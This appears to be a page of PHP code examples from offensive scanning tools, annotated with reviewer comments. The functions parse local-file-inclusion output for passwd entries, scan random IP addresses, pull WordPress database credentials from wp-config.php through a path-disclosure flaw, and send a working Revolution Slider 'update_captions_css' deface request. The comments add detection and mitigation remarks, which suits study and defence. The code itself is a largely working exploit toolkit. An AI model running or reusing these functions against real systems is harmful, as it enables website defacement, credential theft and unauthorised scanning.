示例#1
/**
 * Result-parsing step of a local-file-inclusion check: decide from an already
 * fetched response body whether a passwd-style file was disclosed, print the
 * verdict and append any hit to lfi.txt.
 *
 * Review notes:
 * - The verdict depends only on the case-insensitive substring "root" occurring
 *   anywhere in the body, so a page that merely mentions the word is reported
 *   as a hit. Confirm any finding from this output independently.
 * - Every timestamp uses date("h:m:s"); "m" is the month, not the minute, so
 *   these log times are unsuitable for timeline reconstruction.
 * - lfi.txt accumulates disclosed account lines in plaintext in the working
 *   directory and should be handled as sensitive data.
 *
 * @param array $config Reads 'file' (printed in the banner), 'line' (separator
 *                      text) and 'alvo' (written as the first line of the log entry).
 * @param array $rest   Reads 'corpo', the response text that is searched.
 * @return void Does not return on a hit: the script ends with exit.
 */
function main($config, $rest)
{
    __plus();
    print "[ " . date("h:m:s") . " ] [!][EXPLOITATION THE FILE]:{$config['file']}\n";

    // Gather every fragment that begins with one of five common account names.
    $accountLines = array();
    foreach (array("(root:.*)", "(sbin:.*)", "(ftp:.*)", "(nobody:.*)", "(mail:.*)") as $pattern) {
        preg_match_all($pattern, $rest['corpo'], $hits);
        $accountLines = array_merge($accountLines, $hits[0]);
    }

    // No "root" anywhere in the body: report a miss and fall through to the caller.
    if (!preg_match("#root#i", $rest['corpo'])) {
        print "[ " . date("h:m:s") . " ] [x][NOT VULN]\n";
        return;
    }

    $report = "[ " . date("h:m:s") . " ] [+][IS VULN][RESUME][VALUES]:\n" . $config['line'] . "\n";
    foreach ($accountLines as $entry) {
        $report .= "[ " . date("h:m:s") . " ] [VALUE]: {$entry}\n";
    }
    $report .= $config['line'];

    __plus();
    // Append-only evidence file; the target identifier precedes the extracted lines.
    file_put_contents('lfi.txt', "{$config['alvo']}\n{$report}\n", FILE_APPEND);
    print "{$report}[VALUES SAVED]: lfi.txt\n\n";
    exit;
}
示例#2
/**
 * Driver loop of the scanner: print the start banner and disclaimer, then pass
 * one address at a time to __subProcess() according to $params['op'].
 *
 *   op == 0  addresses derived from $params['range'] (four [start, end] pairs)
 *   op == 1  addresses returned by __getIPRandom(), counted against 'limit-ip'
 *   op == 2  addresses taken from the array in $params['file']
 *
 * Review notes:
 * - Range mode is not a full sweep of the four ranges: each octet is varied on
 *   its own while the other three stay at their start value, and the end value
 *   is exclusive.
 * - In modes 1 and 2 the __banner() result for invalid input is discarded, not
 *   echoed. Whether __banner() stops the script is not visible here, so the
 *   loop that follows may still run on the invalid value.
 * - Mode 1 probes addresses with no relation to any agreed scope, so an
 *   authorised assessment would need to restrict itself to modes 0 or 2 with
 *   an approved target list.
 *
 * @param array $params Reads 'line', 'op', 'range', 'limit-ip' and 'file'.
 * @return void
 */
function main($params)
{
    // Banner and disclaimer; the $_SESSION["cNN"] values wrap the text
    // (presumably terminal colour codes — confirm where they are set).
    echo __banner("{$_SESSION["c13"]}{$params['line']}{$_SESSION["c00"]}", 1);
    echo "{$_SESSION["c01"]}Starting SCANNER RouterHunterBR 1.0 at [" . date("d-m-Y H:i:s") . "]{$_SESSION["c09"]}\n[!] legal disclaimer: Usage of RouterHunterBR for attacking targets without prior mutual consent is illegal. \nIt is the end user's responsibility to obey all applicable local, state and federal laws.\nDevelopers assume no liability and are not responsible for any misuse or damage caused by this program{$_SESSION["c00"]}\n\n";

    if ($params['op'] == 0) {
        // Range mode: walk octet positions 0..3, replacing one octet per pass.
        for ($pos = 0; $pos < 4; $pos++) {
            for ($i = $params['range'][$pos][0]; $i < $params['range'][$pos][1]; $i++) {
                __plus();
                $octets = array(
                    $params['range'][0][0],
                    $params['range'][1][0],
                    $params['range'][2][0],
                    $params['range'][3][0],
                );
                $octets[$pos] = $i;
                __subProcess($params, implode('.', $octets));
                __plus();
            }
        }
    } elseif ($params['op'] == 1) {
        // Random mode.
        if (!not_isnull_empty($params['limit-ip'])) {
            __banner("{$_SESSION["c01"]}0x__[{$_SESSION["c02"]}SET NUMBER OF IPS\n{$_SESSION["c00"]}");
        }
        $i = 0;
        while ($i <= $params['limit-ip']) {
            __subProcess($params, __getIPRandom());
            __plus();
            $i++;
        }
    } elseif ($params['op'] == 2) {
        // File mode: one entry of the pre-loaded list per call.
        if (!is_array($params['file'])) {
            __banner("{$_SESSION["c01"]}0x__[{$_SESSION["c02"]}SOMETHING WRONG WITH YOUR FILE\n{$_SESSION["c00"]}");
        }
        __plus();
        foreach ($params['file'] as $address) {
            __subProcess($params, $address);
            __plus();
        }
    }
}
/**
 * Fetch $url . $plugin and report whether the response discloses WordPress
 * database settings (wp-config.php constants) or passwd-style account lines.
 * A hit is printed and appended to WORDPRESS_A_F_D.txt.
 *
 * Review notes for defenders and reviewers:
 * - The request carries a fixed, distinctive User-Agent (set below), which can
 *   serve as a web-log signature for this tool.
 * - The follow-up request is only possible when the first response renders an
 *   absolute filesystem path (an error message containing "<b>/" up to
 *   "/wp-content/"). Not displaying PHP errors in production removes that input.
 * - The follow-up is a recursive call with no depth limit, and on that path the
 *   function returns before curl_close() is reached.
 * - The log file stores database credentials in plaintext and must be handled
 *   as sensitive evidence.
 * - Timestamps built with date("h:m:s") use "m" (month) where minutes would be
 *   "i", so they are not reliable for timeline work.
 *
 * @param string $url    Base URL; concatenated with $plugin without a separator.
 * @param string $plugin Path and query string appended to $url.
 * @return null No value is returned on any path.
 */
function __request($url, $plugin)
{
    $objcurl = curl_init();
    $caminho = NULL;
    $status = array();
    curl_setopt($objcurl, CURLOPT_URL, $url . $plugin);
    // Response headers are included in the returned text, so the pattern checks
    // below run over headers and body together.
    curl_setopt($objcurl, CURLOPT_HEADER, 1);
    curl_setopt($objcurl, CURLOPT_RETURNTRANSFER, 1);
    // Static User-Agent string: usable as a detection signature in access logs.
    curl_setopt($objcurl, CURLOPT_USERAGENT, "::INURLBR::/1.0.1 (compatible; MSIE 5.01; Linux 5.0)");
    // The overall timeout (10 s) is shorter than the connect timeout (20 s),
    // so the 10 s limit is the one that takes effect.
    curl_setopt($objcurl, CURLOPT_CONNECTTIMEOUT, 20);
    curl_setopt($objcurl, CURLOPT_TIMEOUT, 10);
    $corpo = curl_exec($objcurl);
    // A leaked absolute path in the response triggers a second request that
    // names wp-config.php relative to that path. The handle opened above is not
    // closed on this path.
    if (preg_match_all("(<b>/.*./wp-content/)", $corpo, $caminho)) {
        return __request($url, "{$plugin}&file=" . str_replace('wp-content/', '', $caminho[0][0]) . "wp-config.php");
    }
    __plus();
    // NOTE(review): "#readfile(#i" has an unbalanced "(" and does not compile as
    // a PCRE pattern; preg_match() warns and returns false, so only the first
    // two alternatives can ever match.
    if (preg_match("#DB_NAME#i", $corpo) || preg_match("#root:#i", $corpo) || preg_match("#readfile(#i", $corpo)) {
        // wp-config.php constants: each pattern is greedy up to the last "'" on the line.
        preg_match_all("(DB_NAME.*')", $corpo, $status['DB_NAME']);
        preg_match_all("(DB_USER.*')", $corpo, $status['DB_USER']);
        preg_match_all("(DB_PASSWORD.*')", $corpo, $status['DB_PASSWORD']);
        preg_match_all("(DB_HOST.*')", $corpo, $status['DB_HOST']);
        preg_match_all("(DB_CHARSET.*')", $corpo, $status['DB_CHARSET']);
        // passwd-style account lines
        preg_match_all("(root:.*)", $corpo, $status['pwd1']);
        preg_match_all("(sbin:.*)", $corpo, $status['pwd2']);
        preg_match_all("(ftp:.*)", $corpo, $status['pwd3']);
        preg_match_all("(nobody:.*)", $corpo, $status['pwd4']);
        preg_match_all("(mail:.*)", $corpo, $status['pwd5']);
        __plus();
        // The [0][0] reads below are unconditional: any pattern that matched
        // nothing yields an undefined-offset warning and an empty field.
        $res = "\n------------------------------------------------------------------------------------------------------------------\n0x " . date("h:m:s") . " [INFO][VULN]::     [ " . date("d-m-Y H:i:s") . " ]\n";
        $res .= "0x " . date("h:m:s") . " [INFO][VULN][DB]:: " . $status['DB_NAME'][0][0];
        $res .= "::" . $status['DB_USER'][0][0];
        $res .= "::" . $status['DB_PASSWORD'][0][0];
        $res .= "::" . $status['DB_HOST'][0][0];
        $res .= "::" . $status['DB_CHARSET'][0][0];
        $res .= preg_match("#root#i", $corpo) ? "\n0x " . date("h:m:s") . "[INFO][VULN][FILE_PASSWORD]::{$status['pwd1'][0][0]} - {$status['pwd2'][0][0]} - {$status['pwd3'][0][0]} - {$status['pwd4'][0][0]} - {$status['pwd5'][0][0]}" : NULL;
        $res .= "\n0x " . date("h:m:s") . " [INFO][VULN][URL]::{$url}{$plugin}";
        $res .= "\n------------------------------------------------------------------------------------------------------------------\n";
        print $res;
        // NOTE(review): the search strings appear empty in this listing;
        // presumably they were non-printable sequences lost in extraction —
        // confirm against the original file.
        $res = str_replace('', '', str_replace('', '', str_replace('', '', $res)));
        // Plaintext credential log, appended in the working directory.
        file_put_contents('WORDPRESS_A_F_D.txt', "{$res}\n", FILE_APPEND);
        __plus();
    } else {
        print "\n0x " . date("h:m:s") . " [INFO][NOT VULN]:: {$url}{$plugin} \n";
    }
    curl_close($objcurl);
    __plus();
}
/**
 * Send one POST to {target}/wp-admin/admin-ajax.php with the revslider
 * "update_captions_css" action and report whether the response contains "true".
 *
 * Review notes for defenders and reviewers:
 * - The request shape is the detection point: a POST to admin-ajax.php with
 *   action=revslider_ajax_action and client_action=update_captions_css, then
 *   a read of client_action=get_captions_css. Because the fields are passed
 *   as an array, cURL sends them as multipart/form-data. Alerting on these
 *   parameter values from clients without an administrator session, and
 *   keeping the plugin updated, are the corresponding mitigations.
 * - TLS peer and host verification are both switched off, so the response is
 *   not authenticated and the verdict can be influenced by anything on the
 *   network path.
 * - The success test is a case-insensitive search for "true" anywhere in the
 *   response, so a positive verdict is not proof that content changed.
 * - eregi() was removed in PHP 7.0; on current PHP the call is a fatal error.
 * - cookie.log and revslider.txt are written to the working directory.
 *
 * @param array $__ Reads 'target', 'proxy', 'deface' and 'line'.
 * @return void
 */
function __request($__)
{
    $curlxpl = curl_init();
    curl_setopt($curlxpl, CURLOPT_URL, "{$__['target']}/wp-admin/admin-ajax.php");
    // A proxy is used only when one was supplied.
    !is_null($__['proxy']) ? curl_setopt($curlxpl, CURLOPT_PROXY, $__['proxy']) : NULL;
    // User-Agent comes from a helper defined elsewhere, so unlike a static
    // string it is not a stable log signature; match on the POST fields instead.
    curl_setopt($curlxpl, CURLOPT_USERAGENT, __setUserAgentRandom());
    curl_setopt($curlxpl, CURLOPT_POST, 1);
    // 'data' carries caller-supplied content from $__['deface'].
    curl_setopt($curlxpl, CURLOPT_POSTFIELDS, array("action" => "revslider_ajax_action", "client_action" => "update_captions_css", "data" => $__['deface']));
    curl_setopt($curlxpl, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($curlxpl, CURLOPT_FOLLOWLOCATION, 1);
    // Certificate and hostname checks disabled: the peer is never verified.
    curl_setopt($curlxpl, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($curlxpl, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($curlxpl, CURLOPT_COOKIEFILE, 'cookie.log');
    curl_setopt($curlxpl, CURLOPT_COOKIEJAR, 'cookie.log');
    // The return value of __plus() is concatenated onto the response text; a
    // failed curl_exec() (false) contributes an empty string.
    $result = curl_exec($curlxpl) . __plus();
    if (eregi('true', $result)) {
        $h = "{$__['target']}/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css";
        echo "[!] [INFO] Success Exploit!\n";
        echo "[!] [INFO] URL FILE MODIFIED: {$h}\n{$__['line']}\n";
        __plus();
        // Append-only list of URLs reported as modified.
        file_put_contents("revslider.txt", "{$h}\n\n", FILE_APPEND);
    } else {
        echo "[!] [FAIL] {$__['target']} : nothing changed \n{$__['line']}\n";
    }
    curl_close($curlxpl);
    unset($curlxpl);
}
示例#5
/**
 * Orchestrate a search-query ("dork") run: build the query list, print the
 * banners, pass each query to __engines() and hand the collected URLs to
 * __process(), then call __exitProcess().
 *
 * Review notes:
 * - $motor and $cod are not used by any live statement; they appear only in
 *   the two commented-out lines that built a function from $cod with
 *   create_function(). That function evaluates a code string (deprecated in
 *   PHP 7.2, removed in 8.0), so re-enabling it would execute whatever text
 *   the caller supplies.
 * - Behaviour is driven by $_SESSION['config']: 'dork-file', 'dork-rand',
 *   'proxy-file', 'pr' and 'totas_urls' are read here, and 'totas_urls' is
 *   reset here when 'pr' is truthy. Where the search step fills 'totas_urls'
 *   is not visible in this block.
 *
 * @param string $dork  One query, or several separated by the literal "[DORK]".
 * @param mixed  $motor Unused in the live code path.
 * @param mixed  $cod   Unused in the live code path.
 * @return void
 */
function __main($dork, $motor, $cod)
{
    // [0] queries from the argument, [1] queries from a file when configured
    // (otherwise a copy of [0]), [2] queries from __randomDork() when configured.
    $dork_[0] = strstr($dork, '[DORK]') ? explode('[DORK]', $dork) : array($dork);
    $dork_[1] = not_isnull_empty($_SESSION['config']['dork-file']) ? __openFile($_SESSION['config']['dork-file'], 1) : $dork_[0];
    $dork_[2] = not_isnull_empty($_SESSION['config']['dork-rand']) ? __randomDork($_SESSION['config']['dork-rand']) : array();
    // [3] merged list with duplicates and empty values dropped.
    $dork_[3] = array_filter(array_unique(array_merge($dork_[0], $dork_[1], $dork_[2])));
    // Optional proxy list; anything that is not an array is treated as "no proxies".
    $file_proxy = not_isnull_empty($_SESSION['config']['proxy-file']) ? __openFile($_SESSION['config']['proxy-file'], 1) : NULL;
    $list_proxy = is_array($file_proxy) ? $file_proxy : NULL;
    print __bannerLogo();
    __startingBanner();
    // Positional walk from 0 through count() inclusive; empty() skips slots
    // that are absent or empty.
    for ($i = 0; $i <= count($dork_[3]); $i++) {
        if (!empty($dork_[3][$i])) {
            echo "\n{$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}{$_SESSION["c16"]}[ DORK ]::{$_SESSION["c1"]}[ {$dork_[3][$i]} ]\n";
            // Disabled: dynamic function built from $cod (see review notes above).
            //$objNewSearch = create_function('$dork_, $motor, $list_proxy', $cod);
            //$objNewSearch(urlencode($dork_[3][$i]), $motor, $list_proxy);
            __engines(urlencode($dork_[3][$i]), $list_proxy) . __plus();
            // With 'pr' set, the URLs gathered so far (newline-separated in
            // 'totas_urls') are processed after each query and the buffer is cleared.
            $_SESSION["config"]["pr"] ? __process(explode("\n", $_SESSION["config"]["totas_urls"])) . __plus() : NULL;
            $_SESSION["config"]["pr"] ? $_SESSION["config"]["totas_urls"] = NULL : NULL;
            echo "\n";
        }
    }
    // Without 'pr', everything gathered is processed once, after the last query.
    !$_SESSION["config"]["pr"] ? __process(explode("\n", $_SESSION["config"]["totas_urls"])) . __plus() : NULL;
    __exitProcess();
}